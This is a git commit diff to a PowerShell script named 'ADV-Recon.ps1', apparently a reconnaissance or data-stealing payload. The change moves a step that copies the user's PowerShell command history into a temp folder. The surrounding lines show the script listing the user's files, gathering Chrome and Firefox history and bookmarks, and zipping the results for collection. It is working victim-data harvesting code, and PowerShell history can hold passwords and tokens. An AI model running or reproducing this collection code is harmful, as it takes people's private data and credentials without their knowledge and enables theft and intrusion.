Update ADV-Recon.ps1

2022-12-18 18:54:32 -06:00
parent 4fb9b2b36b
commit 61d0456955
1 changed files with 3 additions and 6 deletions
@@ -55,6 +55,9 @@ New-Item -Path $env:tmp/$FolderName -ItemType Directory
 # Recon all User Directories
 tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt

+# Powershell history
+Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination  $env:TEMP\$FolderName\Powershell-History.txt
+
 ############################################################################################################################################################

 function Get-fullName {
@@ -504,12 +507,6 @@ Get-BrowserData -Browser "chrome" -DataType "bookmarks" >> $env:TMP\$FolderName\

 Get-BrowserData -Browser "firefox" -DataType "history" >> $env:TMP\$FolderName\BrowserData.txt

-
-############################################################################################################################################################
-
-# Powershell history
-Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination  $env:TEMP\$FolderName\Powershell-History.txt
-
 ############################################################################################################################################################

 Compress-Archive -Path $env:tmp/$FolderName -DestinationPath $env:tmp/$ZIP